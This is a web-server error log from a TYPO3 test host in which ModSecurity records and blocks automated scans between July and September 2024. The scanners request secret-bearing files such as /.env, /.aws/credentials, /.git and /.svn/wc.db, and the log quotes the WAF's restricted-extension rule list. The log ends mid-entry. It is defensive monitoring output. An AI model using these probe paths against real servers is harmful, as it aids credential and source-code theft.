[Sat Jul 27 11:19:43.806398 2024] [:error] [pid 741686] [client 45.148.10.230:52424] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqS7r5w4nfG8X_SXoz170AAAAAY"]
[Sat Jul 27 11:19:43.806841 2024] [:error] [pid 741686] [client 45.148.10.230:52424] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqS7r5w4nfG8X_SXoz170AAAAAY"]
[Mon Jul 29 23:39:29.248480 2024] [authz_core:error] [pid 789725] [client 179.43.188.122:56018] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Aug 01 18:34:03.110530 2024] [:error] [pid 855511] [client 45.148.10.142:46536] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqu4-2FLiravg_K_HdnWOAAAAAE"]
[Thu Aug 01 18:34:03.112616 2024] [:error] [pid 855511] [client 45.148.10.142:46536] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqu4-2FLiravg_K_HdnWOAAAAAE"]
[Thu Aug 01 18:34:03.113243 2024] [:error] [pid 855511] [client 45.148.10.142:46536] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqu4-2FLiravg_K_HdnWOAAAAAE"]
[Sat Aug 03 03:13:52.606408 2024] [authz_core:error] [pid 902313] [client 45.148.10.206:51862] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Aug 06 03:46:45.457793 2024] [authz_core:error] [pid 970078] [client 83.147.52.49:57488] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Aug 06 19:24:34.349428 2024] [authz_core:error] [pid 970073] [client 45.148.10.206:49460] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Aug 07 20:17:21.114135 2024] [:error] [pid 1008918] [client 45.148.10.206:37608] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrO6McnvXJuUIxSTKSu6rgAAABc"]
[Wed Aug 07 20:17:21.114955 2024] [:error] [pid 1008918] [client 45.148.10.206:37608] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrO6McnvXJuUIxSTKSu6rgAAABc"]
[Wed Aug 07 20:17:21.115531 2024] [:error] [pid 1008918] [client 45.148.10.206:37608] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrO6McnvXJuUIxSTKSu6rgAAABc"]
[Thu Aug 08 15:28:59.042325 2024] [authz_core:error] [pid 1015473] [client 45.148.10.206:58728] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Aug 08 17:05:44.869733 2024] [authz_core:error] [pid 1015472] [client 45.148.10.59:37938] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Aug 11 11:05:28.400326 2024] [:error] [pid 1096834] [client 45.148.10.142:35836] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrh-2Am3etGq8eTP47CjEQAAAAg"]
[Sun Aug 11 11:05:28.401918 2024] [:error] [pid 1096834] [client 45.148.10.142:35836] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrh-2Am3etGq8eTP47CjEQAAAAg"]
[Sun Aug 11 11:05:28.402074 2024] [:error] [pid 1096834] [client 45.148.10.142:35836] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zrh-2Am3etGq8eTP47CjEQAAAAg"]
[Sun Aug 11 23:07:22.295037 2024] [:error] [pid 1096832] [client 83.147.52.49:56020] [client 83.147.52.49] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrkoCqOYJ5TK5ybVktmoKAAAAAQ"]
[Sun Aug 11 23:07:22.295300 2024] [:error] [pid 1096832] [client 83.147.52.49:56020] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrkoCqOYJ5TK5ybVktmoKAAAAAQ"]
[Sun Aug 11 23:07:22.295513 2024] [:error] [pid 1096832] [client 83.147.52.49:56020] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ZrkoCqOYJ5TK5ybVktmoKAAAAAQ"]
[Sun Aug 11 23:07:22.301535 2024] [authz_core:error] [pid 1096822] [client 83.147.52.49:56028] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.gitlab-ci.yml
[Sun Aug 11 23:07:22.305112 2024] [:error] [pid 1095410] [client 83.147.52.49:56030] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrkoCvEFRMblWN1jmx960AAAAAU"]
[Sun Aug 11 23:07:22.305286 2024] [:error] [pid 1095410] [client 83.147.52.49:56030] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrkoCvEFRMblWN1jmx960AAAAAU"]
[Sun Aug 11 23:07:22.305454 2024] [:error] [pid 1095410] [client 83.147.52.49:56030] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ZrkoCvEFRMblWN1jmx960AAAAAU"]
[Sun Aug 11 23:07:22.310196 2024] [:error] [pid 1096123] [client 83.147.52.49:56070] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrkoCjVDwua2QAlUOKTHOgAAAAY"]
[Sun Aug 11 23:07:22.310342 2024] [:error] [pid 1096123] [client 83.147.52.49:56070] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrkoCjVDwua2QAlUOKTHOgAAAAY"]
[Sun Aug 11 23:07:22.310489 2024] [:error] [pid 1096123] [client 83.147.52.49:56070] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZrkoCjVDwua2QAlUOKTHOgAAAAY"]
[Mon Aug 12 08:34:37.114221 2024] [authz_core:error] [pid 1117996] [client 45.148.10.142:53968] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Aug 19 16:24:32.605147 2024] [:error] [pid 1284782] [client 45.148.10.142:42834] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsNVoCqkj_mK2zoUNTKfPwAAAAQ"]
[Mon Aug 19 16:24:32.607142 2024] [:error] [pid 1284782] [client 45.148.10.142:42834] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsNVoCqkj_mK2zoUNTKfPwAAAAQ"]
[Mon Aug 19 16:24:32.607331 2024] [:error] [pid 1284782] [client 45.148.10.142:42834] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZsNVoCqkj_mK2zoUNTKfPwAAAAQ"]
[Mon Sep 23 21:07:13.724889 2024] [authz_core:error] [pid 2139801] [client 159.89.127.165:54966] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Mon Sep 23 21:07:14.811394 2024] [:error] [pid 2139829] [client 159.89.127.165:43584] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZvG8Yhx2Bq7ctVYDxZdfeQAAAAc"]
[Mon Sep 23 21:07:14.811773 2024] [:error] [pid 2139829] [client 159.89.127.165:43584] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZvG8Yhx2Bq7ctVYDxZdfeQAAAAc"]
[Mon Sep 23 21:07:14.811978 2024] [:error] [pid 2139829] [client 159.89.127.165:43584] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ZvG8Yhx2Bq7ctVYDxZdfeQAAAAc"]
[Mon Sep 23 21:07:15.158743 2024] [:error] [pid 2139800] [client 159.89.127.165:43598] [client 159.89.127.165] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvG8Y9evmKje-77II-I8-wAAAAM"]
[Mon Sep 23 21:07:15.159125 2024] [:error] [pid 2139800] [client 159.89.127.165:43598] [client 159.89.127.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvG8Y9evmKje-77II-I8-wAAAAM"]
[Mon Sep 23 21:07:15.159464 2024] [:error] [pid 2139800] [client 159.89.127.165:43598] [client 159.89.127.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvG8Y9evmKje-77II-I8-wAAAAM"]
[Mon Sep 23 21:07:15.496468 2024] [authz_core:error] [pid 2139799] [client 159.89.127.165:43602] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Sep 24 11:12:29.500938 2024] [:error] [pid 2147653] [client 92.118.39.244:44514] [client 92.118.39.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvKCfZgd_Q0F5yg5tTNdvQAAAAc"]
[Tue Sep 24 11:12:29.501686 2024] [:error] [pid 2147653] [client 92.118.39.244:44514] [client 92.118.39.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvKCfZgd_Q0F5yg5tTNdvQAAAAc"]
[Tue Sep 24 11:12:29.502125 2024] [:error] [pid 2147653] [client 92.118.39.244:44514] [client 92.118.39.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvKCfZgd_Q0F5yg5tTNdvQAAAAc"]
[Tue Sep 24 16:17:08.279421 2024] [authz_core:error] [pid 2151466] [client 195.178.110.21:34018] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Sep 24 22:21:43.196639 2024] [:error] [pid 2144600] [client 45.148.10.172:37408] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvMfV7dij3mCJJXeq7dyvQAAAAQ"]
[Tue Sep 24 22:21:43.197418 2024] [:error] [pid 2144600] [client 45.148.10.172:37408] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvMfV7dij3mCJJXeq7dyvQAAAAQ"]
[Tue Sep 24 22:21:43.197915 2024] [:error] [pid 2144600] [client 45.148.10.172:37408] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZvMfV7dij3mCJJXeq7dyvQAAAAQ"]
[Wed Sep 25 01:34:35.114946 2024] [:error] [pid 2163319] [client 109.202.99.36:24111] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "ZvNMizi7Hvr15toPaIjbSgAAAAM"]
[Wed Sep 25 01:34:35.116949 2024] [:error] [pid 2163295] [client 109.202.99.36:11029] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id 